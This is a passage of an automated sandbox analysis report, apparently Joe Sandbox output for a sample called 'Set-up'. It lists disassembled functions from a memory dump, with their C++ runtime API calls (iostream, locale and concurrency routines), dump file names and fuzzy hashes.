                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B1AB
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B1C9
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B22D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: a7fb91310248dd0365f609735ff1eb24b33e284773c8cef1c84da96e7a974c54
                                                                                              • Instruction ID: 42cd3e11f89d16f5881c8255f779cc783bc0386f53dd3053a473e15b2ef8947f
                                                                                              • Opcode Fuzzy Hash: a7fb91310248dd0365f609735ff1eb24b33e284773c8cef1c84da96e7a974c54
                                                                                              • Instruction Fuzzy Hash: F321AC71A11108AFCB04CFE8C991EEDFBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D153
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D172
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D190
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D1F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: a26b6f97c18c587c9562b8a737a6c7ee6d13a62f5617bf2c6a4909a3d6394b73
                                                                                              • Instruction ID: 157dd5f4f326ea6a4286bfc90cd2a9fdef492c6342b1a9e6c1fcaf4694a3d0e1
                                                                                              • Opcode Fuzzy Hash: a26b6f97c18c587c9562b8a737a6c7ee6d13a62f5617bf2c6a4909a3d6394b73
                                                                                              • Instruction Fuzzy Hash: 7821AC71A11108AFCB04CFA8C981EEDBBB5AF58308F244059E142B7291EB399F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D04C
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D06B
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D089
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D0ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 5d0d588c5fcbe51d8cb219537270cd5f43758c23f0fed23b4e14d0523b270743
                                                                                              • Instruction ID: afdc7fe1ccb07ce174369fa23360f7a056add0cfcc0614f78e6065d5b4b80bb0
                                                                                              • Opcode Fuzzy Hash: 5d0d588c5fcbe51d8cb219537270cd5f43758c23f0fed23b4e14d0523b270743
                                                                                              • Instruction Fuzzy Hash: 6F21AC71A11108AFCB04CFA8C991EEDFBB5AF18308F244059E142B7291EB399F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DD5B
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DD83
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sbumpc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DDCA
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DDFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2890278595-0
                                                                                              • Opcode ID: 2a4d51d61d4ab1da9664c7c8352baf2217af05f0139b71a1a8074799c52e5d65
                                                                                              • Instruction ID: 6e0ba54610358428a0061f0b20030dbcf302eb86d44146d2f5e25fa550513f8f
                                                                                              • Opcode Fuzzy Hash: 2a4d51d61d4ab1da9664c7c8352baf2217af05f0139b71a1a8074799c52e5d65
                                                                                              • Instruction Fuzzy Hash: 49217431961B4ADFCB10CF65C8905ADBBB0BF65324F60C16ED8A567290E7388B41DF61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1EE93
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?,?,?,00000014), ref: 6BC1EEB3
                                                                                              • _CxxThrowException.MSVCR100(6BC117C4,6BC4CB18), ref: 6BC1EEC9
                                                                                              • ?_Segment_index_of@_Concurrent_vector_base_v4@details@Concurrency@@KAII@Z.MSVCP100(?,00000014), ref: 6BC1EED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@Concurrency@@Concurrent_vector_base_v4@details@ExceptionH_prolog3_catchSegment_index_of@_Throw
                                                                                              • String ID:
                                                                                              • API String ID: 264175448-0
                                                                                              • Opcode ID: 9346a8ced81c94903426e73bfb4f9b0b7dce51eaba3e7fc46fee0808fbc00a17
                                                                                              • Instruction ID: 983a8703443d4625d80c78027e6cfbe641be6f8b3a3852d131f21849aad7d82f
                                                                                              • Opcode Fuzzy Hash: 9346a8ced81c94903426e73bfb4f9b0b7dce51eaba3e7fc46fee0808fbc00a17
                                                                                              • Instruction Fuzzy Hash: 2C11BE7293821A9BCB10CF60C8419DE77B6BF88315B104569E816EB990FB3D9745DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC191D9
                                                                                                • Part of subcall function 6BC1A494: __EH_prolog3.LIBCMT ref: 6BC1A49B
                                                                                                • Part of subcall function 6BC1A494: ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(?,00000000,6BC191E9,?,00000004,6BC1870C,?,?,00000000,?), ref: 6BC1A4D5
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(?,00000004,6BC1870C,?,?,00000000,?), ref: 6BC1921C
                                                                                              • ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1922C
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000018), ref: 6BC19244
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0_Concurrency@@Lock@details@Reentrant$H_prolog3$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 694345405-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AB33
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C,6BC1A716,00000014,6BC1A63D,?), ref: 6BC1AB41
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1ABAB
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ABB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??1_?set@event@H_prolog3V123@@
                                                                                              • String ID:
                                                                                              • API String ID: 2645808778-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29398
                                                                                              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP100(?,00000000,00000000,00000008), ref: 6BC293DB
                                                                                              • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP100(00000000,00000000,?,?,?,?,00000008), ref: 6BC2940A
                                                                                              • ?swap@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXAAV12@@Z.MSVCP100(?,?,?,?,?,00000008), ref: 6BC29428
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$??0?$basic_istream@?init@?$basic_ios@?swap@?$basic_ios@D@std@@@1@_D@std@@@2@_H_prolog3V12@@
                                                                                              • String ID:
                                                                                              • API String ID: 1953463137-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E000
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2E02B
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2E050
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2E0AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2087867759-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E0DE
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2E106
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sputbackc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2E125
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2E14C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?sputbackc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 985700304-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E1B4
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2E1DC
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sungetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2E1F8
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2E21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?sungetc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
